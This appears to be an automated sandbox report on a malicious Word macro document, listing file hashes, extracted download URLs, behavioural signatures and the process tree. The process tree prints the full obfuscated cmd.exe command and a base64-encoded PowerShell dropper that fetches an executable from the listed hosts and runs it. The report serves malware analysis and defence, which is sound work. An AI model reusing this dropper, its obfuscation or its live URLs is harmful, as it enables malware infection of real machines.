Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 06:08
Behavioral task
behavioral1
Sample
71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc
-
Size
76KB
-
MD5
71136aab6cae39e138fab55e2f00a583
-
SHA1
164bc374e50c579c0557ec32cd573afc907db362
-
SHA256
aba5bddcd0584140102c5a904be47f3025b6ba796114bbd2039e272bf26d7be7
-
SHA512
c1ed00716505531ef2a2c60ddd0e06e9a1bba03f10483a18f5eab07e91cd4283ebf03ea9f100d34657821e30cb1f17d0e0a273824cddeab4addef4523be7300e
-
SSDEEP
1536:3nptJlmrJpmxlRw99NBq+ax4+6MT4I6Dhl93tCX:Zte2dw99fUn8
Malware Config
Extracted
http://tresillosmunoz.com/2HB
http://tonyleme.com.br/8l3XcSKQ
http://sg2i.com/wwG
http://lunacine.com/CQ
http://www.yuanjhua.com/OwUzt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4268 4736 Cmd.exe WINWORD.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 36 4336 powershell.exe 42 4336 powershell.exe 46 4336 powershell.exe 53 4336 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 4268 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4736 WINWORD.EXE 4736 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4336 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4736 WINWORD.EXE 4736 WINWORD.EXE 4736 WINWORD.EXE 4736 WINWORD.EXE 4736 WINWORD.EXE 4736 WINWORD.EXE 4736 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 4736 wrote to memory of 4268 4736 WINWORD.EXE Cmd.exe PID 4736 wrote to memory of 4268 4736 WINWORD.EXE Cmd.exe PID 4268 wrote to memory of 4336 4268 Cmd.exe powershell.exe PID 4268 wrote to memory of 4336 4268 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\SYSTEM32\Cmd.exeCmd /V/C"^s^e^t N^Y^GD==A^A^I^AAC^A^gA^A^I^A^AC^Ag^AA^IA^AC^AgAAI^AAC^A^g^AAIAAC^Ag^AAIA^AC^A^9BQf^AsH^AoBwY^A^QH^A^hBw^Y^A^0^H^A^7^A^w^a^AEGA^lBgcA^IG^A7^AQ^d^AIH^A^EB^AJAAC^At^BQ^ZAQHA^J^B^Q^LAUGArB^w^bAY^HAu^B^Q^S^As^D^A^p^AQd^AIH^AEB^A^JAAC^As^Aw^a^AkG^A^H^B^A^J^AgCAlB^Ab^AkGA^G^BAZAEGAvB^A^bA^4^G^A3Bw^b^AQE^A^uA^Q^a^A^0GA^GB^AJAsH^A5^BgcA^Q^HA^7B^QK^A^sG^AW^B^wSAQC^A^gAgb^A^kG^AgA^w^aA^kGAHBAJA^gCA^o^BwY^AE^G^Al^BgcA^8GA^m^Bw^O^AcCAl^BAeAU^G^A^uAwJAsCA1^Bw^QAoH^AkA^wKAcCAcBwJA^sC^A^j^BQaA^w^G^AiB^Qd^A^AH^A^6^Ag^d^A4^GAl^B^AJ^A0^DA^1BgcAQ^E^AkA^wO^AcCA^2^Ag^M^AUD^AnAAIA^0^D^Ag^A^Qd^A^MEA6B^A^JAsD^ApA^wJ^AA^EAnA^A^KA^QHAp^B^AbA^AH^ATB^g^L^AcC^A^0Bg^eAU^FA^3^BwTA^8CAt^Bw^bAMGA^u^A^QYAUHA^o^Bg^a^A4^GA^h^B^QdAkH^AuA^w^dAcHA^3B^wL^A^8C^A6AAc^AQ^H^A0^BAaAAEAR^Bw^Q^A^8C^A^tB^wbA^M^G^AuAQ^Z^A4GA^pB^wY^A^E^G^Au^BQ^d^A^wGAvAw^LAoDAw^BA^d^AQH^Ao^B^A^Q^AcEA^3^B^w^dA8C^At^Bw^bAM^G^A^u^A^QaA^IDAnB^wcA8C^AvAgO^A^A^H^A0^B^AdAg^GA^ABQ^U^A^s^EA^TB^wYAg^FAz^AAbA^gD^AvAgc^AIGA^u^AQbA8G^A^jB^gLAU^GAtBQ^ZA^w^GA5Bgb^A8^G^A^0^BwL^A^8C^A^6^A^AcAQH^A^0BAa^AA^EACB^ASAI^D^Av^A^Qb^A^8^GA^jB^gLAoH^Av^BgbAU^H^A^tBwc^A^8^GA^s^BA^b^A^kGAzBQZA^IH^A0B^w^LA8CA6^AAcA^QHA^0B^A^aAcCA9A^waA^Y^FAL^B^A^J^A^sD^A0B^g^b^AU^G^A^p^B^A^bA^M^E^A^i^B^QZAc^FAu^A^A^dA^U^GA^OBA^IA^QH^Aj^B^Q^ZAoGA^i^Bw^b^A0C^A^3BQ^Z^A^4GA9^AQa^A^0GAGBA^J e- ll^ehsr^e^wop&&^f^or /^L %^O ^in (9^0^5,^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABGAG0AaQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAFYAawA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAZQBzAGkAbABsAG8AcwBtAHUAbgBvAHoALgBjAG8AbQAvADIASABCAEAAaAB0AHQAcAA6AC8ALwB0AG8AbgB5AGwAZQBtAGUALgBjAG8AbQAuAGIAcgAvADgAbAAzAFgAYwBTAEsAUQBAAGgAdAB0AHAAOgAvAC8AcwBnADIAaQAuAGMAbwBtAC8AdwB3AEcAQABoAHQAdABwADoALwAvAGwAdQBuAGEAYwBpAG4AZQAuAGMAbwBtAC8AQwBRAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHkAdQBhAG4AagBoAHUAYQAuAGMAbwBtAC8ATwB3AFUAegB0ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJAB6AEMAdQAgAD0AIAAnADUAMgA2ACcAOwAkAEQAcgB1AD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAHoAQwB1ACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAawAgAGkAbgAgACQASwBWAGsAKQB7AHQAcgB5AHsAJABGAG0AaQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABHAGkAawAsACAAJABEAHIAdQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABEAHIAdQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl
Filesize263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0